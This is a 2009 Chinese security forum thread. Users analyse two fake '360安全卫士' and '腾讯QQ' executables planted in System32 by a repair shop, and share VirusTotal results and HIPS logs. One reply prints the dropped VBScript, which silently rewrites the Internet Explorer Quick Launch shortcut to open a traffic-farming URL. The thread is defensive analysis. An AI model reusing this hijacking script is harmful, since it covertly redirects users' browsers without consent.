初步确定是恶意程序了。。过主流杀软

昨天自己换了块主板、cpu、内存、显卡。。。
后来装上去蓝屏。。。
无奈拉去维修点。。
回来发现帮我重装了系统。。多了n多茄子东西，用工具看了看。。发现启动项多了

c:\WINDOWS\system32\360安全卫士.EXE
c:\WINDOWS\system32\腾讯QQ.EXE
这两个。。很不正常啊
上传到vt扫了下。。。主流的没报。。咖啡和几个非主流的报了
不过肯定是不正常。

决定重装了。。。之前再研究下这个茄子系统。。
上传这两个给大家看看有没有问题




如果没问题那算我居心叵测。。。如果有那么一丁丁点问题~~嘿嘿




根据lx的测试日志。。应该不是好东西了。。

vt的扫描就不贴图了。。
反正一个是4/36
一个是8/36

[ 本帖最后由 单身熟男 于 2009-10-10 20:41 编辑 ]

tanlimo

文件大小不对，位置也有问题，八成不是好东西。

hddu

2009-10-10 20:16:31    运行应用程序      操作:阻止
进程路径:E:\360安全卫士\360安全卫士.EXE
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bt5844.bat
触发规则:所有程序规则->系统程序设置->*\cmd.exe

2009-10-10 20:16:56    创建文件      操作:阻止
进程路径:E:\腾讯QQ\腾讯QQ.EXE
文件路径:C:\WINDOWS\temp\vbs.vbs
触发规则:所有程序规则->文件创建设置_普通模式2->%SystemDrive%\*.vbs

2009-10-10 20:16:56    创建文件      操作:阻止
进程路径:E:\腾讯QQ\腾讯QQ.EXE
文件路径:C:\WINDOWS\temp\121785.vbs
触发规则:所有程序规则->文件创建设置_普通模式2->%SystemDrive%\*.vbs

剑舞江南

移动版江民杀毒软件没报，但是ClamWin报了一个病毒：

恩。。。根据2l的日志初步判断应该是恶意程序了。。。
那么根据我在vt上扫描的情况应该可以确定是过主流杀软的了。。。

改标题。。。赚眼球

saga3721

如今的病毒作者离了CMD已经活不了了[:27:]

kingmuro

过kv2008

尤金卡巴斯基

To KL

BING126

McAfee 报了2个可疑月神。。

asinasina

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=app936.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("APPDATA")            
Set link = Shell.CreateShortcut("C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk")
link.Arguments = "http://www.888ge.com/?2"
link.description = "查找并显示 Internet 上的信息和网站。"                             
link.TargetPath = "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
link.WindowStyle = 1                                 
link.WorkingDirectory = "C:\Program Files\Internet Explorer"                 
link.Save

Set Shell = CreateObject("WScript.Shell")
DesktopPath = Shell.SpecialFolders("APPDATA")            
Set link = Shell.CreateShortcut("C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\启动 Internet Explorer 浏览器.lnk")
link.Arguments = "http://www.888ge.com/?2"
link.description = "查找并显示 Internet 上的信息和网站。"                             
link.TargetPath = "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
link.WindowStyle = 1                                 
link.WorkingDirectory = "C:\Program Files\Internet Explorer"                 
link.Save

reg那个exe释放第一个win.ini
然后另外两个放vbs。。。。内容就下面
杯具啊，那QQ图标写的是360.com........
没发现联网，应该就是设网址到那个赚流量吧
没发现联网行为，应该不是木马

[ 本帖最后由 asinasina 于 2009-10-10 22:34 编辑 ]